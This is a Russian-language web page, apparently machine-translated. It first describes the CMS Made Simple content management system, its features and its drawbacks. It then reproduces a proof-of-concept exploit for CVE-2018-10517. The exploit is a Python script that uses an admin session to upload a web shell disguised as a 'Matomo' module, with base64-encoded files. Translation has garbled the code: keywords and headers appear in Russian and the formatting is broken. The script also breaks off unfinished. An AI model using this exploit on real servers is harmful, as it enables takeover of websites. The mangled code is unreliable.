Made simple cms templates: Welcome, CMS Made Simple Lovers! .:. WeLoveCMSMS

CMS Made Simple — CMS

Эта бесплатная система управления контентом с открытым исходным кодом предназначена для того, чтобы позволить начинающим пользователям и людям с меньшими техническими знаниями создавать веб-сайты и управлять ими. Это включает в себя небольшие сайты и крупные корпоративные сайты.

Он используется авторами/редакторами контента, разработчиками и программистами и основан на простом пакете, который можно расширять по мере необходимости. Эта расширяемость является ведущей особенностью этой системы.

О CMS Made Simple

CMS Made Simple впервые была выпущена в 2004 году и с тех пор используется разработчиками в разных странах мира. Он был выпущен в соответствии с условиями публичной лицензии GNU; это означает, что эта CMS, основанная на сообществе, доступна для загрузки, разработки и последующего обмена с другими единомышленниками.

Одной из наиболее привлекательных особенностей этой CMS является простота использования. Как следует из названия, он позволяет пользователям с небольшими техническими навыками или вообще без них создавать веб-сайты с минимумом суеты и стресса. Пользователь не перегружен многочисленными функциями, надстройками и функциями, а вместо этого может настроить свой сайт в соответствии со своими требованиями.

Характеристики CMS Made Simple

Эта система написана на PHP, поддерживается базой данных MySQL и содержит ряд функций, включая ряд настраиваемых шаблонов, редактор WYSIWYG и многочисленные сторонние расширения.

Особым аспектом этой CMS является тот факт, что она доступна в виде простого базового пакета, подходящего для новичков и нетехнических специалистов, который также поставляется с несколькими готовыми функциями, такими как оптимизированные для SEO URL-адреса.

Однако есть возможность расширить функциональность, привлекательную для программистов и разработчиков. Система поставляется в комплекте с несколькими основными надстройками, такими как редактор WYSIWYG, функция поиска и менеджер новостей, но другие могут быть добавлены по мере необходимости. Популярные расширения включают блоги, галереи изображений и системы корзины покупок.

Другие особенности:

  • Простота установки и удобство использования, особенно для начинающих пользователей
  • Соответствует стандартам доступности
  • Оптимизированные для SEO URL-адреса, помогающие повысить рейтинг страниц
  • Надежный API, допускающий неограниченные возможности расширения
  • Настраиваемые темы
  • Встроенная помощь и поддержка, а также резервное копирование, предоставляемое сообществом CMS Made Simple.
  • Возможность интеграции других функций и надстроек, например. блоги

Это основные преимущества этой CMS. Что кажется его самой сильной стороной, так это простота использования, которая неоднократно упоминается в любом количестве онлайн-обзоров.

Это делает его идеальным выбором для новых авторов/редакторов контента или людей без каких-либо знаний в области программирования или языков разметки, таких как HTML.

Недостатки CMS Made Simple

У этой CMS есть проблема с производительностью в связи с низкой скоростью, которая является проблемой для крупных корпоративных веб-сайтов или сайтов, ежедневно получающих большой объем трафика.

Эта CMS может быть лучшим вариантом для небольших веб-сайтов.

Другие недостатки:

  • Большой объем памяти
  • Для редактирования требуется браузер

Могут возникнуть другие проблемы, но они различаются в зависимости от проекта. Каждый проект ставит перед CMS новый набор проблем, которые отличаются от проекта к проекту.

CMS Made Simple 2.2.7 — удаленное выполнение кода

CMS Made Simple — это система управления контентом с открытым исходным кодом. Он построен с использованием PHP и Smarty Engine, который разделяет контент, функциональность и шаблоны.

Первоначальные отправки 
 # Название эксплойта: CMS Made Simple 2.2.7 — удаленное выполнение кода
 # Дата: 2018-11-04
 # Автор эксплойта: Лучиан Иоан Нитеску
 # Контакт: https://twitter.com/LucianNitescu
 # Веб-сайт: https://nitesculucian.github.io
 # Домашняя страница поставщика: https://www.cmsmadesimple.org/
 # Ссылка на программное обеспечение: https://www. cmsmadesimple.org/downloads/cmsms/
 # Версия: 2.2.7
 # Проверено на: Ubuntu 18.04
 # CVE: CVE-2018-10517
№ 1. Описание:
 # Злоумышленник или злонамеренный пользователь, имеющий доступ к интерфейсу администрирования, может выполнить код на сервере.
# 2. Доказательство концепции:
запросы на импорт
# целевая конфигурация (необходимы учетные данные администратора для получения действительного сеанса)
target_url="<ВАШ HTTP(S)://URL>"
 session_cookie = "<ИМЯ ВАШЕГО СЕАНСОВОГО ФАЙЛА COOKIE>"
 session_value = "<ВАШЕ ЗНАЧЕНИЕ COOKIE СЕССИИ>"
# загрузка шелла под названием плагина Matomo
burp0_url = target_url + "/admin/moduleinterface.php"
burp0_cookies = {session_cookie: session_value}
 burp0_headers = {"User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0", "Accept": "text/html,application/xhtml+xml,application/ xml;q=0,9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Referer": "http://gk1v1ml3nfrd1bs00o69fmwnh . public2.attackdefenselabs.com/", "Content-Type": "multipart/form-data; border=-----------------------------------------207726338310671742711263591267", "Соединение": "закрыть", "Upgrade-Insecure-Requests": "1 "}
 burp0_data="----------------------------207726338310671742711263591267\r\nContent-Disposition: form-data; name=\"mact\ "\r\n\r\nModuleManager,m1_,local_import,0\r\n--------------- 207726338310671742711263591267\r\nContent-Disposition: данные формы; name=\"__c\"\r\n\r\n9a63802b6c4579cc01c\r\n--------------------------------------------207726338310671742711263591267\ r\nContent-Disposition: данные формы; имя=\"m1_upload\"; filename=\"test.xml\"\r\nContent-Type: text/xml\r\n\r\n\n 1.3\n Matomo \n <версия>0.0.1\n 2.1.5\n \n < ![CDATA[PGJyIC8+QXV0aG9yOiBleWVkZWUtbWVkaWEgJmx0O21vcnRlbkBwb3Vsc2VuLm9yZyZndDs8YnIgLz48YnIgLz5WZXJzaW9uOiAwLjAuMTxiciAvPjxiciAvPkNoYW5nZSBIaXN0b3J5OjxiciAvPi0tIE1pc3NpbmcgTGFuZ3VhZ2VzdHJpbmc6IGNoYW5nZWxvZyAtLTxiciAvPg==]]>\n \n \n / \n 1\n \n \n /action. admin_settings.php\n 0\n \n \n \n /action.admin_statistics.php\n 0 \n \n \n \n /action. default.php\n 0\n < ![CDATA[PD9waHANCg0KZWNobyAkdGhpcy0+TmVvUHJvY2Vzc1RlbXBsYXRlRnJvbURhdGEoJHRoaXMtPkdldFRyYWNraW5nQ29kZSgpKTs=]]>\n \n \n /naction.savesettings.php0\n \n \n \n /lang/\n 1\n \ n \n /lang/en_US.php\n 0\n \n \n \n /Matomo. module.php\n 0\n  \n \n \n /moduleinfo. ini\n 0\n < ![CDATA[W21vZHVsZV0KbmFtZSA9ICJNYXRvbW8iCnZlcnNpb24gPSAiMC4wLjEiCmF1dGhvciA9ICJleWVkZWUtbWVkaWEiCmF1dGhvcmVtYWlsID0gIm1vcnRlbkBwb3Vsc2VuLm9yZyIKbWluY21zdmVyc2lvbiA9ICIyLjEuNSIKbGF6eWxvYWRhZG1pbiA9IDAKbGF6eWxvYWRmcm9udGVuZCA9IDAK]]>\n \n \n /templates/\n 1\n \n < file>\n /templates/adminsettings.tpl\n 0\n \n \n\r\n-------------------- ---------207726338310671742711263591267--\r\n"
 request.